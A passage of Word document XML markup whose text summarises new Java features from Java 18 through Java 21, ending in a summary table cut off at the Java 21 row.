    <w:p w14:paraId="632C0CEE" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Default character set is now UTF-8 across platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8F069"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Simple Web Server (JEP 408)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082BBFD8" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lightweight HTTP server for prototyping or testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B70D4"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code Snippets in JavaDoc (JEP 413)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D420B2" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@snippet tag to embed code examples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F748E6" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00000000" w:rsidP="00827C5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B6611A6">
          <v:rect id="_x0000_i1808" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4592D" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 19 (September 2022) </w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(Preview/Incubator features)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDE0F9"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual Threads (Preview – JEP 425)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C9130" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lightweight threads to simplify concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569ACB75"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Structured Concurrency (Incubator – JEP 428)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C2C5C" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Easier and safer concurrent programming with better error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE8BA1"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Record Patterns (Preview – JEP 405)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF80E5" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pattern matching for record types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A00B021"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pattern Matching for switch (Preview – JEP 406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57719AC8" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use types and guards in switch expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4BDEB9" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00000000" w:rsidP="00827C5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5C00844">
          <v:rect id="_x0000_i1809" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC208B" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 20 (March 2023) </w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(More previews and enhancements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77695D51"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scoped Values (Incubator – JEP 429)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202DF10D" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A replacement for thread-local variables in virtual threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8546AF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Record Patterns (2nd Preview – JEP 432)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF55B94"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pattern Matching for switch (2nd Preview – JEP 433)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6F27E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual Threads (2nd Preview – JEP 436)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A518850"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Structured Concurrency (2nd Incubator – JEP 437)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E75C46" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00000000" w:rsidP="00827C5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309CF08">
          <v:rect id="_x0000_i1810" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBC2E5" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 21 (LTS – September 2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600A064"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java 21 is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LTS (Long Term Support)</w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> version and includes many finalized features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6115BD98"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Virtual Threads (Final – JEP 444)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1762F0"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pattern Matching for switch (Final – JEP 441)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B4830"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Record Patterns (Final – JEP 440)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D195B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sequenced Collections (JEP 431)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD26937" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New interfaces: SequencedCollection, SequencedSet, SequencedMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B1C74"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Templates (Preview – JEP 430)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F4DD5" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Easy embedding of expressions in strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F9A6FE"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unnamed Classes and Instance Main Methods (Preview – JEP 445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488241B" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Simplifies writing simple Java programs (good for scripting &amp; learning).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE04BD"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scoped Values (Preview – JEP 446)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516893E9" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00000000" w:rsidP="00827C5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A580D78">
          <v:rect id="_x0000_i1811" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF35E6" w14:textId="42B85B55" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
      <w:r w:rsidR="00827C56">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>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3"/>
        <w:gridCol w:w="8930"/>
      </w:tblGrid>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="25C58135" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C393BE" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00A4516F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00946177">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A07BC09" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00A4516F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00946177">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Major Features Introduced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="4EC35CD3" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24FAA339"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E549ACC"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UTF-8 default, simple HTTP server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="2334364F" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37CCE6E4"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AC2834E"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Virtual threads (preview), pattern matching enhancements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="564462A8" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2514288D"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11647760"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Virtual threads 2nd preview, structured concurrency 2nd incubator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="241B8133" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1889BD7F"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
